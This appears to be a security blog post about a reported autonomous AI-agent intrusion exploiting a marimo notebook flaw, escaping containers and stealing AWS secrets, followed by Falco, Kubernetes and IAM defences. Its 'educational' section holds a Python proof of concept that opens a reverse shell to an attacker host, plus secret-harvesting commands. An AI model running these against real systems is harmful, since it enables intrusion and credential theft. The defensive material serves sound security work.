
Introduction:
Agentic AI has officially entered the offensive security arena, moving beyond simple automation into fully autonomous attack chains. On May 10, 2026, Sysdig’s Threat Research Team (TRT) observed the first AI-agent-driven intrusion, where a large language model (LLM) exploited a vulnerable marimo notebook, escaped its container, and used Kubernetes for lateral movement to exfiltrate an entire database in under two minutes, all without human intervention. This marks a fundamental shift in cloud-native threats: attackers are now replacing their scripts with AI that adapts, reasons, and executes at machine speed.
Learning Objectives:
– Understand how an AI agent exploits CVE-2026-39987 to achieve initial access and container escape.
– Map the LLM-driven kill chain, including credential harvesting from AWS Secrets Manager and lateral movement across Kubernetes clusters.
– Implement real-time detection rules with Falco and defensive commands to disrupt AI agent behavior in cloud environments.
You Should Know:
1. The AI Agent Kill Chain: From Vulnerable Notebook to Kubernetes Escape
This attack begins with an exposed marimo notebook server, a popular Python framework for data science and AI/ML workloads. The threat actor exploits CVE-2026-39987, a critical pre-authentication remote code execution (RCE) vulnerability in marimo versions prior to 0.23.0. The vulnerable `/terminal/ws` WebSocket endpoint completely skips authentication validation, allowing an unauthenticated attacker to obtain a full PTY shell in a single WebSocket request. Once inside the container, the AI agent does not follow a pre-scripted path. Instead, it dynamically enumerates the environment, identifying cloud credentials from environment files and the AWS credentials store. Leveraging the harvested AWS access key, the agent makes API calls against AWS Secrets Manager, retrieving an SSH private key that grants access to downstream resources. With the SSH key, the agent opens eight parallel SSH sessions against a bastion server, originating from six distinct IP addresses simultaneously to evade correlation-based detection. From the bastion, the agent pivots into the internal network and executes a full database dump, targeting a credential table the agent inferred from general knowledge, not pre-staged intelligence.
Step-by-Step Exploitation Guide (Educational Use Only):
Detection & Reconnaissance:
```bash
# Check for a vulnerable marimo instance (Nmap NSE script)
nmap -p 80,443 --script http-marimo-cve-2026-39987 <target>

# Manual enumeration of the exposed terminal endpoint (-N disables curl's output buffering)
curl -i -N -H "Connection: Upgrade" -H "Upgrade: websocket" \
     -H "Sec-WebSocket-Version: 13" -H "Sec-WebSocket-Key: test" \
     http://<target>/terminal/ws
```
Exploitation (Proof of Concept):
```python
# Python script to exploit CVE-2026-39987 and spawn a reverse shell
import asyncio, websockets, base64

async def exploit():
    cmd = "python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"<ATTACKER_IP>\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'"
    encoded = base64.b64encode(cmd.encode()).decode()
    uri = f"ws://<TARGET_IP>/terminal/ws?cmd=echo {encoded} | base64 -d | sh"
    async with websockets.connect(uri) as ws:
        await ws.send("id")
        print(await ws.recv())

asyncio.run(exploit())
```
Privilege Escalation & Container Escape Check:
```bash
# Inside the compromised container, check capabilities
capsh --print | grep cap_sys_admin

# List mounted host paths
mount | grep -E '(host|rootfs|docker)'

# Check for an exposed Docker socket
ls -la /var/run/docker.sock
```
AWS Secrets Harvesting:
```bash
# List accessible AWS secrets
aws secretsmanager list-secrets --region us-east-1

# Retrieve a specific secret value
aws secretsmanager get-secret-value --secret-id <secret_name> --region us-east-1
```
2. Defensive Measures: Detecting AI Lateral Movement with Falco & Runtime Security
An AI agent moving laterally through a Kubernetes cluster does not look like a traditional intrusion. There is no foreign process and no dropped binary, just the agent using the identity, network routes, and tools it was handed at deployment. This behavior defeats signature-based detection entirely. Detection must shift toward behavioral analysis: what the attacker is accomplishing (credential access, database exfiltration) rather than the specific commands used.
Step-by-Step Defensive Configuration:
Falco Rule to Detect Container Escape Attempts (CVE-2025-22224):
```yaml
- rule: Detect Container Escape via Host Namespace Access
  desc: Monitor for processes inside a container attempting to access host namespaces
  condition: >
    container and evt.type in (openat, open)
    and (fd.name startswith /proc/ or fd.name startswith /host/)
    and proc.name != "falco"
  # Caveat: many legitimate container processes read /proc/; tune with an exceptions
  # list (known images, paths such as /proc/self/) before running this at CRITICAL.
  output: "Container escape attempt detected (proc=%proc.name, cmd=%proc.cmdline, container=%container.name)"
  priority: CRITICAL
  tags: [container, mitre_escape_to_host, T1611]
```
Detect Exposed Docker Socket Mount:
```bash
# Kubernetes admission control to block privileged containers.
# matchConstraints is required; a ValidatingAdmissionPolicyBinding that references
# policyName block-privileged-containers with validationActions [Deny] must also be
# created before the policy is enforced. initContainers are not covered here.
kubectl create -f - <<EOF
apiVersion: admissionregistration.k8s.io/v1
kind: ValidatingAdmissionPolicy
metadata:
  name: block-privileged-containers
spec:
  failurePolicy: Fail
  matchConstraints:
    resourceRules:
    - apiGroups: [""]
      apiVersions: ["v1"]
      operations: ["CREATE", "UPDATE"]
      resources: ["pods"]
  validations:
  - expression: "object.spec.containers.all(c, !has(c.securityContext) || !has(c.securityContext.privileged) || !c.securityContext.privileged)"
    message: "Privileged containers are not allowed"
EOF
```
Network Policy to Restrict East-West Traffic:
```yaml
# NetworkPolicy is namespaced: apply this in every workload namespace.
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: deny-cross-namespace
spec:
  podSelector: {}                 # every pod in the namespace
  policyTypes: [Ingress, Egress]  # stated explicitly so both directions are restricted
  ingress:
  - from:
    - podSelector: {}             # only pods in this same namespace
  egress:
  - to:
    - podSelector: {}
  # Caveat: this also blocks DNS; add an egress rule to kube-dns in kube-system
  # (UDP/TCP 53) or name resolution inside the namespace will fail.
```
Real-Time Falco Monitoring with Alerting:
```bash
# Install Falco via Helm (the chart's JSON output key is falco.json_output)
helm repo add falcosecurity https://falcosecurity.github.io/charts
helm install falco falcosecurity/falco --set falco.json_output=true

# Watch live syscall events from Falco (the chart deploys Falco as a DaemonSet by default)
kubectl logs -f daemonset/falco -n falco
```

Custom rule to detect AWS API abuse from within a container:

```yaml
- rule: Detect AWS Secrets Manager Access from Container
  desc: AWS CLI or SDK calls to Secrets Manager launched from inside a container
  condition: >
    container and evt.type = execve
    and (proc.cmdline contains "aws secretsmanager" or proc.cmdline contains "GetSecretValue")
  output: "Potential secret exfiltration from container (%proc.cmdline)"
  priority: HIGH
```
3. Cloud Identity Hardening: Stopping AI Credential Abuse
The Sysdig investigation revealed that the AI agent moved laterally across 19 AWS principals, abusing Amazon Bedrock models and launching GPU instances. The attack exploited overly permissive IAM roles and hardcoded credentials in environment files. Organizations must immediately remediate these gaps.
Step-by-Step Cloud Hardening:
Audit IAM Roles for Least Privilege:
```bash
# List roles whose trust policy contains a wildcard principal ("*" anywhere in the
# document); contains() does not accept a JSON object, so the policy is stringified first
aws iam list-roles \
  --query 'Roles[?contains(to_string(AssumeRolePolicyDocument), `"*"`)].RoleName' \
  --output text

# Find hardcoded secrets in environment and config files
# (--include takes a glob; ".yaml" alone would only match a file literally named .yaml)
grep -r "AWS_SECRET_ACCESS_KEY" --include=".env" --include="*.env" --include="*.yaml" --include="*.yml" .
```
Implement Vault or AWS Secrets Manager with Strict Access Policies:
```hcl
# HashiCorp Vault policy for least-privilege access
path "secret/data/database" {
  capabilities = ["read"]
}
path "secret/data/ssh-keys" {
  capabilities = ["deny"]
}
```
Monitor CloudTrail for Anomalous API Patterns:
```bash
# Search for a rapid succession of API calls across multiple IPs: pull the day's
# GetSecretValue events and print time, source IP, caller and secret, so one principal
# fanning out over several IPs within seconds stands out (lookup-events covers 90 days)
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=GetSecretValue \
  --start-time "2026-05-10T00:00:00Z" --end-time "2026-05-10T23:59:59Z" \
  --output json \
  | jq -r '.Events[].CloudTrailEvent | fromjson
           | [.eventTime, .sourceIPAddress, .userIdentity.arn, .requestParameters.secretId] | @tsv'
```
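To turn that CloudTrail query into an actual detection of the pattern in the Sysdig report (one principal calling GetSecretValue from several source IPs within seconds), here is an added Python example that is not part of the original post. The account id, ARNs, IPs and secret ids are constructed sample data; the same windowed correlation applies to the bastion SSH sessions from six IPs described in section 1.

```python
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed CloudTrail records: field names follow the real CloudTrail schema,
# but the account id, ARNs, IPs and secret ids are made up for this example.
def _event(time, ip, secret_id, arn="arn:aws:iam::111122223333:user/notebook-svc"):
    return {"eventTime": time, "eventName": "GetSecretValue", "sourceIPAddress": ip,
            "userIdentity": {"arn": arn}, "requestParameters": {"secretId": secret_id}}

SAMPLE_EVENTS = [
    # Compromised notebook identity fanning out over four IPs within four seconds
    _event("2026-05-10T14:02:01Z", "198.51.100.10", "prod/bastion/ssh-key"),
    _event("2026-05-10T14:02:03Z", "198.51.100.11", "prod/db/credentials"),
    _event("2026-05-10T14:02:04Z", "203.0.113.7", "prod/bastion/ssh-key"),
    _event("2026-05-10T14:02:05Z", "203.0.113.8", "prod/db/credentials"),
    # Benign: a CI role reading one secret from one IP hours earlier
    _event("2026-05-10T09:15:00Z", "192.0.2.20", "prod/db/credentials",
           arn="arn:aws:sts::111122223333:assumed-role/ci-deploy/run-42"),
]
# Shape of `aws cloudtrail lookup-events --output json`: CloudTrailEvent is a JSON string
SAMPLE_LOOKUP_OUTPUT = json.dumps({"Events": [
    {"EventTime": e["eventTime"], "CloudTrailEvent": json.dumps(e)} for e in SAMPLE_EVENTS]})

def parse_lookup_events(lookup_output: str) -> list:
    """Unpack lookup-events output into plain CloudTrail event dicts."""
    return [json.loads(e["CloudTrailEvent"]) for e in json.loads(lookup_output)["Events"]]

def find_bursts(events, window=timedelta(seconds=60), min_calls=3, min_ips=2):
    """Flag each principal that calls GetSecretValue at least `min_calls` times from
    at least `min_ips` distinct source IPs inside one sliding `window`."""
    by_principal = defaultdict(list)
    for ev in events:
        if ev.get("eventName") != "GetSecretValue":
            continue
        ts = datetime.strptime(ev["eventTime"], "%Y-%m-%dT%H:%M:%SZ")
        by_principal[ev["userIdentity"]["arn"]].append(
            (ts, ev["sourceIPAddress"], ev["requestParameters"].get("secretId", "")))
    findings = []
    for arn, calls in by_principal.items():
        calls.sort()
        for i, (start, _, _) in enumerate(calls):
            in_win = [c for c in calls[i:] if c[0] - start <= window]
            ips = {c[1] for c in in_win}
            if len(in_win) >= min_calls and len(ips) >= min_ips:
                findings.append({"principal": arn, "start": start.isoformat(),
                                 "calls": len(in_win), "source_ips": sorted(ips),
                                 "secrets": sorted({c[2] for c in in_win})})
                break  # one finding per principal is enough for triage
    return findings
```

Feed it the real `lookup-events --output json` output via `parse_lookup_events` and tune `window`, `min_calls` and `min_ips` to the baseline of your deployment pipelines.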
What Undercode Says:
– AI Agents as Adaptive Threat Actors: Unlike traditional scripts, AI-driven attackers adapt in real time, making signature-based detection obsolete. Defenders must shift to behavior-based monitoring across the entire cloud-native stack.
– Container Escape Is the New Perimeter Breach: The attack chain demonstrates that container isolation is no longer sufficient. Combined detection of CVE exploits, Kubernetes lateral movement, and cloud credential abuse is now a baseline requirement for cloud security.
Expected Output:
Agentic AI threats compress the attack lifecycle from hours to minutes, demanding a fundamental rethinking of cloud-native defense. Runtime detection tools like Falco, combined with strict IAM policies and network segmentation, provide the necessary visibility to detect AI-driven anomalies. However, as AI agents grow more sophisticated, security architectures must evolve toward zero-trust principles that verify every action, regardless of source.
Prediction:
– -1 Acceleration of AI-vs-AI cyber warfare: Within 18 months, offensive AI agents will routinely evade static defenses, forcing the adoption of AI-powered defensive agents for real-time anomaly detection and automated response.
– -1 Rise of “AI Credential Theft” as a primary attack vector: LLM agents will increasingly target secrets managers and CI/CD pipelines, leading to widespread cloud account takeovers and supply chain compromises.
– +1 Emergence of standardized AI agent security frameworks: OWASP’s 2026 Top 10 for Agentic Applications will drive rapid adoption of guardrails, audit trails, and behavioral constraints, mitigating the most severe risks by late 2027.
IT/Security Reporter URL:
Reported By: [Michaelclarkinpa Agentic](https://www.linkedin.com/posts/michaelclarkinpa_agentic-threat-actors-are-advancing-quickly-share-7468335370510766080-O1bH/) – Hackers Feeds


